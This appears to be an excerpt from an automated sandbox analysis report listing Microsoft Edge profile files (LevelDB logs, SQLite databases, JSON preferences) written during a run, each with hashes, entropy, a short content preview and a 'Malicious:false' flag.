                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):290
                                                                                                                                                                                                        Entropy (8bit):4.9786626899774555
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:YHpoNXR8+eqq59Qu6hsDHF4R8H2a9a1TS7PMVKJTnMRK3VY:YHO8sqD6hsBd2cag7E4T3y
                                                                                                                                                                                                        MD5:C6A79B1A87A8A6D8EDE748744384411B
                                                                                                                                                                                                        SHA1:982BFD5F082522AA42A93F19F782B905F04AAFEF
                                                                                                                                                                                                        SHA-256:EE57385776A3CAE860759324BF55B561467A7906C7935EDC14811021FF8EC02A
                                                                                                                                                                                                        SHA-512:FC44456A912219A08BCDA23111D9AB41D56485441A760D465D62C2FFC038EB3ABE389EF7D70A4AF7BF44A7176DA63E05AAD8B8BDBDEEFD5F68C410379FCA2462
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13375869076793774","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://chrome.cloudflare-dns.com"}],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Reporting and NEL

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3036000, file counter 4, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):36864
                                                                                                                                                                                                        Entropy (8bit):0.5559092700436605
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:TfIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSB:DIEumQv8m1ccnvS6
                                                                                                                                                                                                        MD5:9E6F2C8B7E0D238554688F45D7AB4C09
                                                                                                                                                                                                        SHA1:4FF260CB36625DCD08F7D9CF670C6FA62C749614
                                                                                                                                                                                                        SHA-256:2DD20F8D185663C951186F4A49ACDB759E0BA2BABC4BF3E18A1E3BF2C003E826
                                                                                                                                                                                                        SHA-512:FDEC30B53625897B705D716E2C982735BD1EECDE8AE72E212DE103E2CEF1D5007DE3F3C1819474B40FE67E7498F89540980773E25110CBC497B0496903EDFF3B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................S`.........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000001.dbtmp

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):16
                                                                                                                                                                                                        Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                        MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                        SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                        SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                        SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:MANIFEST-000001.

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000003.log

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):61
                                                                                                                                                                                                        Entropy (8bit):3.7273991737283296
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:S8ltHlS+QUl1ASEGhTFl:S85aEFl
                                                                                                                                                                                                        MD5:9F7EADC15E13D0608B4E4D590499AE2E
                                                                                                                                                                                                        SHA1:AFB27F5C20B117031328E12DD3111A7681FF8DB5
                                                                                                                                                                                                        SHA-256:5C3A5B578AB9FE853EAD7040BC161929EA4F6902073BA2B8BB84487622B98923
                                                                                                                                                                                                        SHA-512:88455784C705F565C70FA0A549C54E2492976E14643E9DD0A8E58C560D003914313DF483F096BD33EC718AEEC7667B8DE063A73627AA3436BA6E7E562E565B3F
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:*...#................version.1..namespace-..&f...............

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\CURRENT (copy)

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):16
                                                                                                                                                                                                        Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                        MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                        SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                        SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                        SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:MANIFEST-000001.

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):381
                                                                                                                                                                                                        Entropy (8bit):5.169343136208209
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:HUz1fiTu1CN23oH+TcwtzjqEKj0QM72KLlVUz1fF7SDM+q2PCN23oH+TcwtzjqEv:+1fhYebvqB6L21fFmM+v1YebvqBZFUv
                                                                                                                                                                                                        MD5:71641120C188B9E0E68BAB5C951696E7
                                                                                                                                                                                                        SHA1:EE3E3FB9114C14927CC477A375F5DF4FCE03AA74
                                                                                                                                                                                                        SHA-256:42BE660F2CEC7081170F6A9F7469C50CAD476863525F3E0AD5CBC99385528BE5
                                                                                                                                                                                                        SHA-512:619F926EFCEB33BB18D9FBB9D3223775B7B3D25FDAAD0F84EA9FD80AC0148C84F0F6EAB404CF61B85AC7BCD77E9BB8CFF84E3E521BD01F0491E436704A68B49C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:2024/11/11-02:11:18.978 13fc Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage since it was missing..2024/11/11-02:11:19.047 13fc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\MANIFEST-000001

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:OpenPGP Secret Key
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):41
                                                                                                                                                                                                        Entropy (8bit):4.704993772857998
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                        MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                        SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                        SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                        SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\000003.log

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2095
                                                                                                                                                                                                        Entropy (8bit):6.262060400999663
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:ika17NpmKOTWzdTYRV+ETlht4l9EpmPL1lyTJNliJpmPL1l6TJ3:ika15pROTWzqRAqlP4lepwxlINlqpwx0
                                                                                                                                                                                                        MD5:2B58D5E7B5B1A12E86774716023AA73B
                                                                                                                                                                                                        SHA1:12B50B6EF82FEEE1007FA0CDDC3E8D69C1227A17
                                                                                                                                                                                                        SHA-256:D74E466DE7123F3330219C5CDDFA793BDEEBA21D31E4F4DF6FCDF079805BCBD5
                                                                                                                                                                                                        SHA-512:CE674A767785C88C5A44A35565F6F75DCCA9685CA9B12412A76E228F62395A90611D725DC1D95A00878B9B71EE193EED54EC7324319EE70AEE8BE5BE72A7E93A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:...n'................_mts_schema_descriptor.....F..................F.................3k.)................device_info-GlobalMetadata@.........J..|..... .*.oQxBx3XB+LeESt8u9/Z/2A==2.000340011677ED77.'device_info-md-oQxBx3XB+LeESt8u9/Z/2A==]..O9Y4QRTO52yAtnmJvgDmbxgG0y4=.. .(.0..........8...../@...../J.Fo0ZVE38AhfYdxChT37PSoU+O9U=R..'device_info-dt-oQxBx3XB+LeESt8u9/Z/2A==....oQxBx3XB+LeESt8u9/Z/2A==..To Be Filled By O.E.M..."QChrome WIN 93.0.961.52 (55ddfa3ef850523eea11b31f81b5facebd8934c3) channel(stable)*.93.0.961.52:$d14a0d0c-703a-47a1-a1a4-158e21707eb4@...../J...Z.To Be Filled By O.E.M.b.To Be Filled By O.E.M.h..r..........93.0.961.52$nd i................device_info-GlobalMetadata@.........J..|..... .*.oQxBx3XB+LeESt8u9/Z/2A==2.000340011677ED77.b.Z................'device_info-md-oQxBx3XB+LeESt8u9/Z/2A==}..O9Y4QRTO52yAtnmJvgDmbxgG0y4=.$4825df59-2fc2-4a0b-a2d5-569bbcb87906.. .(.0...../8...../@...../J.Fo0ZVE38AhfYdxChT37PSoU+O9U=..device_info-GlobalMetadata@.........J..|..... .*.oQxBx3X

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):328
                                                                                                                                                                                                        Entropy (8bit):5.124903720088529
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:HUz1fNrq2PCN23oH+TcwtpIFUt8YUz1fNgZmw+YUz1fNIkwOCN23oH+Tcwta/WLJ:+1fNrv1YebmFUt8Z1fNg/+Z1fNI5eYev
                                                                                                                                                                                                        MD5:3DCEE932E88331AC87803B432F879058
                                                                                                                                                                                                        SHA1:033729E206C9A7AD2F8804CFAC43B38D7E636F1D
                                                                                                                                                                                                        SHA-256:C4DB32542E30CC3B02F236EE73B5874993180DF077B0A9C8698CB5DACD07B791
                                                                                                                                                                                                        SHA-512:9C7F0D3BF08CFFF9BFAEF35DD6325AC1E37DD0FE5A03F6DF5065F5E863CAC42B263016D0A127BEF83806766A336B6285E4B93991607283407CCBE8558222DF7C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:2024/11/11-02:11:11.191 1c84 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/11/11-02:11:11.193 1c84 Recovering log #3.2024/11/11-02:11:11.193 1c84 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG.old (copy)

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):328
                                                                                                                                                                                                        Entropy (8bit):5.124903720088529
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:HUz1fNrq2PCN23oH+TcwtpIFUt8YUz1fNgZmw+YUz1fNIkwOCN23oH+Tcwta/WLJ:+1fNrv1YebmFUt8Z1fNg/+Z1fNI5eYev
                                                                                                                                                                                                        MD5:3DCEE932E88331AC87803B432F879058
                                                                                                                                                                                                        SHA1:033729E206C9A7AD2F8804CFAC43B38D7E636F1D
                                                                                                                                                                                                        SHA-256:C4DB32542E30CC3B02F236EE73B5874993180DF077B0A9C8698CB5DACD07B791
                                                                                                                                                                                                        SHA-512:9C7F0D3BF08CFFF9BFAEF35DD6325AC1E37DD0FE5A03F6DF5065F5E863CAC42B263016D0A127BEF83806766A336B6285E4B93991607283407CCBE8558222DF7C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:2024/11/11-02:11:11.191 1c84 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/11/11-02:11:11.193 1c84 Recovering log #3.2024/11/11-02:11:11.193 1c84 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 8, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):122880
                                                                                                                                                                                                        Entropy (8bit):1.1270069299941012
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:sV+4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWUsVusE6:sV+4n/9p/39J6hwNKRmqu+3VusE
                                                                                                                                                                                                        MD5:A0809345D97723CD4173E27957D88904
                                                                                                                                                                                                        SHA1:0F591E66F05A0422B8FC81A5B0AB6099A6C9A226
                                                                                                                                                                                                        SHA-256:3CA1D9E735A21DF7A4C6CC6272F5754B1EBD6DC79AC4E3E61E3562B4E71FE36E
                                                                                                                                                                                                        SHA-512:7BA1223D04BBA47F0D579FD47654773EAEF2A41BC53BC0323F84095F19CE04A0084AB58F999B6A3ED61F33A87B2142E07AF0493F14EAA307985EC2BA44997617
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\a4c3a700-d7c2-42b3-9867-fd03fc669142.tmp

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (12581), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):12587
                                                                                                                                                                                                        Entropy (8bit):5.385869058351529
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:s72TNk9jPcAWMdkPHhHcAJY6J8gy7K2jJ+6a9AUoI3+5OjuG8uvhJJ/nhuW:s72TNk9jPcAWMdwhHcVu2+EIJBruW
                                                                                                                                                                                                        MD5:3AB47FF399D557B36CCF2FE189E9AD6C
                                                                                                                                                                                                        SHA1:12B0F4EF2CE968769EE011C18D439A5B2DE76510
                                                                                                                                                                                                        SHA-256:E47A63DDE84357C270071659183D925EC21978DC5E5154256A9D664CCBFBEF4B
                                                                                                                                                                                                        SHA-512:AF8892A73D1753F699764E2AAB5E9031C80FF88A3BA00C5D57158421CA4675681F39F987D696D1F2E7FF2CBB2C9533FE4EEB5D1BCCC47E25E02326753D1CEEE0
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_info":[],"account_tracker_service_last_update":"13375782671418792","alternate_error_pages":{"backup":true},"anaheim_import":{"auto_imported_details":{"imported_time":"Wed Sep 22 11:33:08 2021\n","profiles":{"browser_name":6,"is_AutoFillFormData_imported":true,"is_Cookies_imported":true,"is_Extensions_imported":true,"is_Favorite_imported":true,"is_History_imported":true,"is_Payments_imported":true,"is_SavedPasswords_imported":true,"is_Settings_imported":true,"source_path":"C:\\Users\\user\\AppData\\Local\\Packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default"}},"imported_default_search_engine":"https://www.bing.com/search?q={searchTerms}&FORM={referrer:source}"},"autocomplete":{"retention_policy_last_version":94},"autofill":{"orphan_rows_removed":true},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"time_of_last_norm

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\a536047b-7d9d-4410-8f57-49e2beba43bf.tmp

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):23881
                                                                                                                                                                                                        Entropy (8bit):5.594521685095174
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:1sfCtTFLKhOObJ+UoAYDCx9TuqZz0VfUCh7xbog/OVKLlg9RCarUqVvnjphp7OID:1eWpL8F1+UoAYDCx9Tuqh0VfUC9xbogA
                                                                                                                                                                                                        MD5:C2E0EA5931304249D8CA173F48D1603E
                                                                                                                                                                                                        SHA1:F83D6E44BE11C56F7558C59AFEA4EFB04175AB4C
                                                                                                                                                                                                        SHA-256:3166D9F796C222DD8E7AFD9A24AF9B244BCCF61EA0AEC3FE5FE769B8D72C05DB
                                                                                                                                                                                                        SHA-512:A07F32C4BF2D0941470C5A2DFD18664D2803391D3BB268420B2C149CB618B345F67F15BC4E15BDEB60DD771BE8A2EB989CAE11A5F7FF28A2D58A6A1F92DBC56A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"edge":{"services":{"last_account_id":"","last_username":""}},"extensions":{"settings":{"dgiklkfkllikcanfonkcabmbdfmgleag":{"active_permissions":{"api":[],"manifest_permissions":[]},"commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13375782671206215","location":5,"manifest":{"content_capabilities":{"include_globs":["https://*excel.officeapps.live.com/*","https://*onenote.officeapps.live.com/*","https://*powerpoint.officeapps.live.com/*","https://*word-edit.officeapps.live.com/*","https://*excel.partner.officewebapps.cn/*","https://*onenote.partner.officewebapps.cn/*","https://*powerpoint.partner.officewebapps.cn/*","https://*word-edit.partner.officewebapps.cn/*","https://*excel.gov.online.office365.us/*","https://*onenote.gov.online.office365.us/*","https://*powerpoint.gov.online.office365.us/*","https://*word-edit.gov.online.office365.us/*","https://

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\000004.dbtmp

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):16
                                                                                                                                                                                                        Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:1sjgWIV//Rv:1qIFJ
                                                                                                                                                                                                        MD5:6752A1D65B201C13B62EA44016EB221F
                                                                                                                                                                                                        SHA1:58ECF154D01A62233ED7FB494ACE3C3D4FFCE08B
                                                                                                                                                                                                        SHA-256:0861415CADA612EA5834D56E2CF1055D3E63979B69EB71D32AE9AE394D8306CD
                                                                                                                                                                                                        SHA-512:9CFD838D3FB570B44FC3461623AB2296123404C6C8F576B0DE0AABD9A6020840D4C9125EB679ED384170DBCAAC2FA30DC7FA9EE5B77D6DF7C344A0AA030E0389
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:MANIFEST-000004.

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT (copy)

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):16
                                                                                                                                                                                                        Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:1sjgWIV//Rv:1qIFJ
                                                                                                                                                                                                        MD5:6752A1D65B201C13B62EA44016EB221F
                                                                                                                                                                                                        SHA1:58ECF154D01A62233ED7FB494ACE3C3D4FFCE08B
                                                                                                                                                                                                        SHA-256:0861415CADA612EA5834D56E2CF1055D3E63979B69EB71D32AE9AE394D8306CD
                                                                                                                                                                                                        SHA-512:9CFD838D3FB570B44FC3461623AB2296123404C6C8F576B0DE0AABD9A6020840D4C9125EB679ED384170DBCAAC2FA30DC7FA9EE5B77D6DF7C344A0AA030E0389
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:MANIFEST-000004.

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\LOG

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):136
                                                                                                                                                                                                        Entropy (8bit):4.42235543602379
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:tRrURVXfUUfUWnvBFz1Zmwv2YURVXfUUfUWn5dFjV87YURVXfUUfUWn5dFjWGv:HUz1fPJFZZmw+YUz1fP5dFjVeYUz1fP/
                                                                                                                                                                                                        MD5:C66C5B4886671C48B73EDF8ECE8DF7CC
                                                                                                                                                                                                        SHA1:7ECF5E919A208516E9D0EC41AC8C2E7D3C661B9C
                                                                                                                                                                                                        SHA-256:05FA683BD712161E678C99A049B8A2CE98FB7C6E57DED8A5F2E99230EFB2AD5F
                                                                                                                                                                                                        SHA-512:3C17DFD6F555E8FD31734228047CA37B6988A0BA58DD0699996088EB8885D6292FD4CF32B1B7249FF99339ACC27DF24AB46A0D63F6C9425A254CC25FAC81F3CD
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:2024/11/11-02:11:13.637 268 Recovering log #3.2024/11/11-02:11:13.679 268 Delete type=0 #3.2024/11/11-02:11:13.679 268 Delete type=3 #2.

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\LOG.old (copy)

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):136
                                                                                                                                                                                                        Entropy (8bit):4.42235543602379
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:tRrURVXfUUfUWnvBFz1Zmwv2YURVXfUUfUWn5dFjV87YURVXfUUfUWn5dFjWGv:HUz1fPJFZZmw+YUz1fP5dFjVeYUz1fP/
                                                                                                                                                                                                        MD5:C66C5B4886671C48B73EDF8ECE8DF7CC
                                                                                                                                                                                                        SHA1:7ECF5E919A208516E9D0EC41AC8C2E7D3C661B9C
                                                                                                                                                                                                        SHA-256:05FA683BD712161E678C99A049B8A2CE98FB7C6E57DED8A5F2E99230EFB2AD5F
                                                                                                                                                                                                        SHA-512:3C17DFD6F555E8FD31734228047CA37B6988A0BA58DD0699996088EB8885D6292FD4CF32B1B7249FF99339ACC27DF24AB46A0D63F6C9425A254CC25FAC81F3CD
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:2024/11/11-02:11:13.637 268 Recovering log #3.2024/11/11-02:11:13.679 268 Delete type=0 #3.2024/11/11-02:11:13.679 268 Delete type=3 #2.

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\MANIFEST-000004

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:MPEG-4 LOAS
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):50
                                                                                                                                                                                                        Entropy (8bit):5.028758439731456
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:Ukk/vxQRDKIVmt+8jzn:oO7t8n
                                                                                                                                                                                                        MD5:031D6D1E28FE41A9BDCBD8A21DA92DF1
                                                                                                                                                                                                        SHA1:38CEE81CB035A60A23D6E045E5D72116F2A58683
                                                                                                                                                                                                        SHA-256:B51BC53F3C43A5B800A723623C4E56A836367D6E2787C57D71184DF5D24151DA
                                                                                                                                                                                                        SHA-512:E994CD3A8EE3E3CF6304C33DF5B7D6CC8207E0C08D568925AFA9D46D42F6F1A5BDD7261F0FD1FCDF4DF1A173EF4E159EE1DE8125E54EFEE488A1220CE85AF904
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:V........leveldb.BytewiseComparator...#...........

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\f4ff2127-8c5e-4dd0-a466-bd0d1a74a1e8.tmp

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1262
                                                                                                                                                                                                        Entropy (8bit):4.885962682697856
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:Y2esatahVsatJ3aoas2hdsFdJ3RdsxdMHnUsRdMHE3QYhD07nby:Y2eVMhVVfqZs2zs3JzsbMHnUs7MH/Yh7
                                                                                                                                                                                                        MD5:2F27B8C0CFED574E3183820517A7D726
                                                                                                                                                                                                        SHA1:C28F2029F298843BB913F6BE5809567503798C01
                                                                                                                                                                                                        SHA-256:7F56C09AF2036814C9A2DBD0E75CECB6BAE20BB78B200A15C78D09BDDB546579
                                                                                                                                                                                                        SHA-512:BA8D0DC388329FCC002287C9177F96F86E12204495FB0A8530A23E25D8F6B9A97371E7D700E9191814B069D0155528C2ACCFC8BAF25925850B30334BC7A7B0DC
                                                                                                                                                                                                        Malicious:false
